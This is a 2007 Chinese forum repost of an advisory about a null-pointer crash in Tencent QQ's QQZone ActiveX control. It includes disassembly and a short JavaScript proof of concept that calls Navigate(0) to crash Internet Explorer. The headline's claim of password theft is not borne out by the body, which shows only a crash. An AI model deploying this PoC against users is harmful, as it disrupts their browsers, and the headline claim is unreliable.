Jcomics 发表于 2007-2-14 07:30:00

QQ又出新的漏洞 涉及所有版本 可以盗取密码

幻影旅团的axis发现了一个QQZone的activex漏洞.在使用WebCtrl.<br/>方法时,将引用一个空指针,造成ie崩溃.由于该activex没有标记为safe,故会出现安全提示.<br/><br/><strong>细节:</strong><br/><br/>在TencentQQQZoneTWebCtrl.dll中,使用Navigate方法时,将造成一个空指针引用<br/><br/>051024C0 8B4424 04 MOV EAX,DWORD PTR SS:<br/>051024C4 8B5424 08 MOV EDX,DWORD PTR SS:<br/>051024C8 6A 00 PUSH 0<br/>051024CA 6A 00 PUSH 0<br/>051024CC 8B80 B8000000 MOV EAX,DWORD PTR DS:<br/>051024D2 6A 00 PUSH 0<br/>051024D4 6A 00 PUSH 0<br/>051024D6 52 PUSH EDX<br/>051024D7 8B08 MOV ECX,DWORD PTR DS:<br/><br/>此时EAX为null<br/><br/>幻影旅团将对此发布一个POC代码,请勿将此作为非法用途<br/><br/>POC:<br/>&gt;<br/>var qqkcuf = new ActiveXObject("WebCtrl.TWebControl.1");<br/>var arg1 = 0;<br/><br/>qqkcuf.Navigate(arg1);<br/><br/><strong>建议:</strong><br/><br/>禁止ie执行activex<br/><br/>厂商补丁:<br/>目前厂商没有发布补丁 <br/>
页: [1]
查看完整版本: QQ又出新的漏洞 涉及所有版本 可以盗取密码